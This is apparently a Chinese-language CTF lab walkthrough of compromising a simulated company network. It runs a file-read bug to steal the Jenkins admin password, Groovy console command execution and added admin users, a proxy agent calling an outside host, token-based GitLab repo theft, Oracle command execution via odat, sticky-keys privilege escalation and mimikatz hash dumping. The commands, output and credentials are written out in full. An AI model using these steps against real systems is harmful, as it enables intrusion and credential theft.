本文最后更新于 24 天前,其中的信息可能已经有所发展或是发生改变。
fscan扫一下
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.129.53 is alive
[*] Icmp alive hosts len is: 1
39.99.129.53:445 open
39.99.129.53:8080 open
39.99.129.53:80 open
39.99.129.53:135 open
39.99.129.53:139 open
39.99.129.53:3306 open
[*] alive ports len is: 6
start vulscan
[*] NetInfo:
[*]39.99.129.53
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle: http://39.99.129.53:8080 code:403 len:548 title:None
[*] WebTitle: http://39.99.129.53 code:200 len:54646 title:XR SHOP
[+] http://39.99.129.53/www.zip poc-yaml-backup-file
已完成 6/6
[*] 扫描结束,耗时: 50.865665s
[] WebTitle: http://39.99.129.53:8080 code:403 len:548 title:None [] WebTitle: http://39.99.129.53 code:200 len:54646 title:XR SHOP
80是XR shop(WP搭的),8080是jenkins
dir扫一下发现www.zip其中有一个任意文件读取
content-log.php
<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
// Get the content and echo it.
$text = file_get_contents( $logfile );
echo( $text );
}
exit;
权限够直接就能读到flag1
http://39.99.129.53/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
第一关提示
请获取 XR Shop 官网源码的备份文件,并尝试获得系统上任意文件读取的能力。并且,管理员在配置 Jenkins 时,仍然选择了使用初始管理员密码,请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins\.jenkins。
还是利用这个任意文件读取去尝试读一下
.jenkins\secrets\initialAdminPassword:这个文件包含 Jenkins 初次启动时生成的管理员密码,它通常在 Jenkins 安装的初始阶段创建,用于首次登录 Jenkins
所以根据提示拼接一下
http://39.99.129.53/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
510235cf43f14e83b88a9f144199655b
然后我们去登陆
http://39.99.129.53:8080/manage/script
Jenkins 提供了一个 脚本控制台,允许你执行 Groovy 脚本或命令。这对于自动化任务、查询系统状态、或者执行维护工作非常有用
发现此处有个脚本命令行可以执行命令
def command = "whoami"
def proc = command.execute()
proc.waitFor()
println(proc.text)
可以看到权限还是很高的
println "net user empty hacker123! /add".execute().text
println "net localgroup administrators empty /add".execute().text
直接添加用户上去,并设置我们为Admin组
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo:
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetBios: 172.22.14.11 [+]DC XIAORANG\XR-DC
[*] NetBios: 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetBios: 172.22.14.46 XIAORANG\XR-0923
[*] NetInfo:
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetInfo:
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] NetInfo:
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] WebTitle: http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle: http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] WebTitle: http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle: http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[+] http://172.22.14.7/www.zip poc-yaml-backup-file
题目提示要找到Gitlab API Token
直接在前端就找到了,打到这有点搞笑XD
{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}
回到脚本控制台获取对应的明文,获得gitlab PRIVATE-TOKEN
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
glpat-7kD_qLH2PiQv_ywB9hz2
搭建代理,这里忘了截图了(!)
./linux_x64_admin -l 1234 -s 123
"windows_x64_agent" -c 39.107.115.191:1234 -s 123 --reconnect 8
利用API列出GitLab项目
proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
[{"id":6,"description":null,"name":"Internal Secret","name_with_namespace":"XRLAB / Internal Secret","path":"internal-secret","path_with_namespace":"xrlab/internal-secret","created_at":"2022-12-25T08:30:12.362Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/internal-secret.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/internal-secret.git","web_url":"http://gitlab.xiaorang.lab/xrlab/internal-secret","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T08:30:12.362Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/6","issues":"http://gitlab.xiaorang.lab/api/v4/projects/6/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/6/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/6/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/6/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T08:30:12.373Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":4,"description":null,"name":"XRAdmin","name_with_namespace":"XRLAB / XRAdmin","path":"xradmin","path_with_namespace":"xrlab/xradmin","created_at":"2022-12-25T07:48:16.751Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xradmin.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xradmin.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xradmin","readme_url":"http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2023-05-30T10:27:31.762Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/4","issues":"http://gitlab.xiaorang.lab/api/v4/projects/4/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/4/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/4/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/4/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:48:16.788Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":false,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":3,"description":null,"name":"Awenode","name_with_namespace":"XRLAB / Awenode","path":"awenode","path_with_namespace":"xrlab/awenode","created_at":"2022-12-25T07:46:43.635Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/awenode.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/awenode.git","web_url":"http://gitlab.xiaorang.lab/xrlab/awenode","readme_url":"http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:46:43.635Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/3","issues":"http://gitlab.xiaorang.lab/api/v4/projects/3/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/3/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/3/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/3/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:46:44.614Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":2,"description":"Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook","name":"XRWiki","name_with_namespace":"XRLAB / XRWiki","path":"xrwiki","path_with_namespace":"xrlab/xrwiki","created_at":"2022-12-25T07:44:18.589Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xrwiki.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xrwiki.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki","readme_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md","avatar_url":"http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png","forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:44:18.589Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/2","issues":"http://gitlab.xiaorang.lab/api/v4/projects/2/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/2/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/2/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/2/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":null,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:44:18.627Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":false,"jobs_enabled":true,"snippets_enabled":false,"container_registry_enabled":false,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"disabled","builds_access_level":"enabled","snippets_access_level":"disabled","pages_access_level":"public","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"disabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":false,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":1,"description":"This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).","name":"Monitoring","name_with_namespace":"GitLab Instance / Monitoring","path":"Monitoring","path_with_namespace":"gitlab-instance-23352f48/Monitoring","created_at":"2022-12-25T07:18:20.914Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git","http_url_to_repo":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git","web_url":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:18:20.914Z","namespace":{"id":2,"name":"GitLab Instance","path":"gitlab-instance-23352f48","kind":"group","full_path":"gitlab-instance-23352f48","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/1","issues":"http://gitlab.xiaorang.lab/api/v4/projects/1/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/1/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/1/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/1/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"},"packages_enabled":true,"empty_repo":true,"archived":false,"visibility":"internal","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:18:21.108Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":1,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":null}}]
东西有点杂,克隆一下来看
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git
xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账号和密码
# 项目相关配置
ruoyi:
# 名称
name: RuoYi
# 版本
version: 4.1.0
# 版权年份
copyrightYear: 2019
# 实例演示开关
demoEnabled: true
# 文件路径 示例( Windows配置D:/ruoyi/uploadPath,Linux配置 /home/ruoyi/uploadPath)
profile: D:/ruoyi/uploadPath
# 获取ip地址开关
addressEnabled: true
# 开发环境配置
server:
# 服务器的HTTP端口,默认为80
port: 80
servlet:
# 应用的访问路径
context-path: /
tomcat:
# tomcat的URI编码
uri-encoding: UTF-8
# tomcat最大线程数,默认为200
max-threads: 800
# Tomcat启动初始化的线程数,默认值25
min-spare-threads: 30
# 日志配置
logging:
level:
com.ruoyi: debug
org.springframework: warn
# 用户配置
user:
password:
# 密码错误{maxRetryCount}次锁定10分钟
maxRetryCount: 5
# Spring配置
spring:
# 模板引擎
thymeleaf:
mode: HTML
encoding: utf-8
# 禁用缓存
cache: false
# 资源信息
messages:
# 国际化资源文件路径
basename: static/i18n/messages
jackson:
time-zone: GMT+8
date-format: yyyy-MM-dd HH:mm:ss
profiles:
active: druid
# 文件上传
servlet:
multipart:
# 单个文件大小
max-file-size: 10MB
# 设置总上传的文件大小
max-request-size: 20MB
# 服务模块
devtools:
restart:
# 热部署开关
enabled: true
# MyBatis
mybatis:
# 搜索指定包别名
typeAliasesPackage: com.ruoyi.**.domain
# 配置mapper的扫描,找到所有的mapper.xml映射文件
mapperLocations: classpath*:mapper/**/*Mapper.xml
# 加载全局的配置文件
configLocation: classpath:mybatis/mybatis-config.xml
# PageHelper分页插件
pagehelper:
helperDialect: oracle
reasonable: true
supportMethodsArguments: true
params: count=countSql
# Shiro
shiro:
user:
# 登录地址
loginUrl: /login
# 权限认证失败地址
unauthorizedUrl: /unauth
# 首页地址
indexUrl: /index
# 验证码开关
captchaEnabled: true
# 验证码类型 math 数组计算 char 字符
captchaType: math
cookie:
# 设置Cookie的域名 默认空,即当前访问的域名
domain:
# 设置cookie的有效访问路径
path: /
# 设置HttpOnly属性
httpOnly: true
# 设置Cookie的过期时间,天为单位
maxAge: 30
session:
# Session超时时间,-1代表永不过期(默认30分钟)
expireTime: 30
# 同步session到数据库的周期(默认1分钟)
dbSyncPeriod: 1
# 相隔多久检查一次session的有效性,默认就是10分钟
validationInterval: 10
# 同一个用户最大会话数,比如2的意思是同一个账号允许最多同时两个人登录(默认-1不限制)
maxSession: -1
# 踢出之前登录的/之后登录的用户,默认踢出之前登录的用户
kickoutAfter: false
# 防止XSS攻击
xss:
# 过滤开关
enabled: true
# 排除链接(多个用逗号分隔)
excludes: /system/notice/*
# 匹配链接
urlPatterns: /system/*,/monitor/*,/tool/*
root@dkhkd7ohfwION6yEyW48:~/xradmin/ruoyi-admin/src/main/resources# ls
application-druid.yml application.yml banner.txt ehcache logback.xml mybatis static templates
root@dkhkd7ohfwION6yEyW48:~/xradmin/ruoyi-admin/src/main/resources# cat application-druid.yml
# 数据源配置
spring:
datasource:
type: com.alibaba.druid.pool.DruidDataSource
driverClassName: oracle.jdbc.driver.OracleDriver
druid:
# 主库数据源
master:
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
# 从库数据源
slave:
# 从数据源开关/默认关闭
enabled: false
url:
username:
password:
# 初始连接数
initialSize: 5
# 最小连接池数量
minIdle: 10
# 最大连接池数量
maxActive: 20
# 配置获取连接等待超时的时间
maxWait: 60000
# 配置间隔多久才进行一次检测,检测需要关闭的空闲连接,单位是毫秒
timeBetweenEvictionRunsMillis: 60000
# 配置一个连接在池中最小生存的时间,单位是毫秒
minEvictableIdleTimeMillis: 300000
# 配置一个连接在池中最大生存的时间,单位是毫秒
maxEvictableIdleTimeMillis: 900000
# 配置检测连接是否有效
validationQuery: SELECT 1 FROM DUAL
testWhileIdle: true
testOnBorrow: false
testOnReturn: false
webStatFilter:
enabled: true
statViewServlet:
enabled: true
# 设置白名单,不填则允许所有访问
allow:
url-pattern: /druid/*
# 控制台管理用户名和密码
login-username:
login-password:
filter:
stat:
enabled: true
# 慢SQL记录
log-slow-sql: true
slow-sql-millis: 1000
merge-sql: true
wall:
config:
multi-statement-allow: true
用odat打oracle
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user empty admin123! /add'
proxychains ./odat-libc2.17-x86_64 dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators empty /add'
直接RDP登上去,找到flag02
internal-secret/credentials.txt里找到XR-0923的账密
zhangshuai/wSbEajHzZs
直接RDP连上46
权限不足,没法查看Admin下的东西
net user zhangshuai
查看当前用户权限,想办法提权
C:\Users\zhangshuai>net user zhangshuai
用户名 zhangshuai
全名
注释
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2022/12/26 10:33:13
密码到期 从不
密码可更改 2022/12/27 10:33:13
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2025/9/21 19:30:24
可允许的登录小时数 All
本地组成员 *Remote Desktop Users *Remote Management Use
*Users
全局组成员 *None
命令成功完成。
zhangshuai是Remote Management Use组的,可以打winrm
proxychains evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
SeRestorePrivilege所以能无视ACL修改文件或者编辑注册表,类似于之前的放大镜提权,我们可以把cmd.exe重命名为sethc.exe,然后在锁屏界面连按五次shift启动sethc提权
cd C:\Windows\System32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
终于拿到flag了
将我们写入admin用户
写入后,我们在RDP上去
上传一个猕猴桃我们去拿hash
但是有个很恶心的地方就是对猕猴桃版本有要求,如果不对会报错
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list
Authentication Id : 0 ; 32768 (00000000:00008000)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/9/21 19:13:58
SID :
msv :
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : ab6f563648a1c89f8ab77339b9aadba2
